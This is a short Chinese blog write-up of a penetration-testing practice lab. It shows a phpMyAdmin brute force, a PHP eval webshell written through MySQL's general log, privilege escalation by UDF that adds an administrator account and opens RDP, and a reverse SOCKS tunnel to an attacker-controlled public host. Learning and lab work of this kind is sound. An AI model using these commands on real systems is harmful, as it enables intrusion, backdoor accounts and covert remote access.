Hu3sky's blog

域渗透练习

Word count: 662 / Reading time: 3 min
2018/05/25 Share

0x00 拿webshell

扫目录

进入网站,页面404.。。但这就是正常界面。没有任何方向,先扫目录。1看到有phpmyadmin。进去,尝试直接对其进行爆破,2可以看到爆破成功。

写木马

我们登陆进去,试一试能不能直接写入木马,但我们没有目录。再回去看扫出来的目录,有个test.php,进去发现是phpinfo()。便可以看到数据库根目录,3我们再去写木马。发现写不进去。4,这里要用到一个方法,http://www.freebuf.com/column/143125.html 在这篇文章中有讲到,

1
2
3
4
5
set global general_log='on';

set global general_log_file='G:/apm/apache2/htdocs/hu3sky2.php';

select "<?php @eval($_POST('cmd')); ?>";

可以看到,成功写入5,接着我们连接菜刀6。查看一下权限,7,只是一个user,所以接下来我们要进行提权

0x01 提权

这里,我选择udf提权,可以直接向菜刀里传一个udf.dll到mysql插件目录G:\apm\Mysql\lib\plugin\下,但需要一个可供外部连接的数据库账号,所以创建一个可供外部连接的数据库账号,就用之前的账号

1
2
3
4
5
 

GRANT ALL PRIVILEGES ON *.* TO 'test'@'%' IDENTIFIED BY 'mysqltoor' WITH GRANT OPTION;

FLUSH PRIVILEGES;

8,接下来,就可以开始提权了。我们在phpmyadmin sql命令下首先创建cmdshell函数创建一个账号并加入到管理员,然后再打开3389端口供我们连接

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
 

Create Function cmdshell returns string soname 'udf.dll';

select cmdshell('net user hu3sky hu3sky /add');

select cmdshell('net localgroup administrators /add hu3sky');

drop function cmdshell;



Create Function open3389 returns string soname 'udf.dll';

select open3389();

drop function open3389;

0x02 建立隧道

虽然打开了靶机的3389端口,但是我们和靶机之间依旧隔着一堵碍眼的防火墙,无法直接连到靶机的3389上面去,所以这里我们使用ew打开一个socks5隧道,先将ew用菜刀传上去。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
# 攻击者在公网IP上 运行:

./ew_for_linux64 -s rcsocks -l 1080 -e 8888 //在公网上侦听1080端口,并把来自1080端口的流量重定向到8888端口

# 受害者运行:

ew_for_Win.exe -s rssocks -d [攻击者公网IP] -e 8888

# 然后 vim /etc/proxychains.conf 配置代理文件为:

socks5 [攻击者公网IP] 1080

# 最后利用proxychains 执行命令

proxychains rdesktop [受害者IP]:3389

9
这个proxychains代理真的迷到我了,25号整了一整天,没代理起VPS,然后今天,27号晚上,学习XXE,需要用到nc命令,我就打开kali,无意间发现居然代理成功了。。。。真的迷。

CATALOG
  1. 1. 0x00 拿webshell
    1. 1.1. 扫目录
    2. 1.2. 写木马
  2. 2. 0x01 提权
  3. 3. 0x02 建立隧道